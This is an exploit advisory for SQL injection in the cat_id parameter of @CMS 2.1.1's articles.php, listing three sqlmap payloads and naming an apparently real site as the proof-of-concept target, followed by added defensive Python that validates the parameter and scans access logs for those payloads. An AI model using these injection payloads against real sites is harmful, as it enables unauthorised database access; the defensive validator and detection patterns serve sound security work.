# SQL Injection on @CMS 2.1.1 Stable
# Risk: High
# CWE number: CWE-89
# Date: 22/08/2014
# Vendor: www.atcode.net
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint
# Vulnerable File: articles.php
# Exploit: http://host/articles.php?cat_id=[SQLI]
# PoC: http://carla-columna.de/articles.php?cat_id=[SQLI]

--- "SQLi using sqlmap." ---

Place: GET
Parameter: cat_id

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo

Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs

---

# Thanks
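The sqlmap output above names cat_id on articles.php as the injection point and lists three payload classes. The Python below is an added example, not part of the advisory or of @CMS, written from the defender's side: it implements the strict-integer check that articles.php should apply to cat_id before the value reaches any query (the fix for CWE-89 on a numeric id), and it scans web-server access logs for requests whose cat_id would fail that check, labelling each one with the payload class from the advisory it resembles. The log lines, the client address and the log format are constructed for the example; the three injected values are the advisory's own payloads, URL-encoded as a client would send them.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined-style). Line 1 is a
# benign request; lines 2-4 carry the advisory's three payloads, URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Aug/2014:10:00:01 +0000] "GET /articles.php?cat_id=5 HTTP/1.1" 200 4312
203.0.113.5 - - [22/Aug/2014:10:00:02 +0000] "GET /articles.php?cat_id=5%27%20AND%206158%3D6158%20AND%20%27SEMo%27%3D%27SEMo HTTP/1.1" 200 4312
203.0.113.5 - - [22/Aug/2014:10:00:03 +0000] "GET /articles.php?cat_id=5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x7163666971%2C0x6648715351716d446a54%2C0x71676e6371%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 4410
203.0.113.5 - - [22/Aug/2014:10:00:09 +0000] "GET /articles.php?cat_id=5%27%20AND%20SLEEP%285%29%20AND%20%27XLrs%27%3D%27XLrs HTTP/1.1" 200 4312
"""

# Minimal parser for the combined log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures for the three sqlmap techniques listed in the advisory, applied to
# the decoded cat_id value. Order is by specificity; a value may match several.
PAYLOAD_CLASSES = (
    ("time-based blind", re.compile(r"\bsleep\s*\(", re.I)),
    ("union query", re.compile(r"\bunion\b.*?\bselect\b", re.I)),
    ("boolean-based blind", re.compile(r"'\s*(?:and|or)\s+\S+\s*=\s*\S+", re.I)),
)

# Assumed vulnerable path and parameter, taken from the advisory header.
VULNERABLE_PATH = "/articles.php"
VULNERABLE_PARAM = "cat_id"


def is_strict_int(value: str) -> bool:
    """Server-side validation the fix should enforce: cat_id is a short
    base-10 integer and nothing else. Every payload above fails this check."""
    return re.fullmatch(r"\d{1,10}", value) is not None


def classify_payload(value: str) -> list[str]:
    """Return the advisory's technique names whose signature appears in value."""
    return [name for name, rx in PAYLOAD_CLASSES if rx.search(value)]


def scan_log(text: str) -> list[dict]:
    """One finding per request to the vulnerable path whose cat_id is not a strict integer."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        parts = urlsplit(m.group("target"))
        if parts.path != VULNERABLE_PATH:
            continue
        # parse_qs percent-decodes the values, so the signatures see the raw payload.
        for value in parse_qs(parts.query).get(VULNERABLE_PARAM, []):
            if is_strict_int(value):
                continue  # well-formed id; would pass the server-side check
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "cat_id": value,
                "classes": classify_payload(value),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['classes']}: cat_id={f['cat_id']!r}")
```

Run stand-alone, the script reports the three injected requests and leaves the benign `cat_id=5` alone. The same `is_strict_int` rule (or an integer cast, or a prepared statement with an integer-bound parameter) placed in articles.php before the value is used in SQL removes the injection point the advisory describes, since none of the listed payloads survive it.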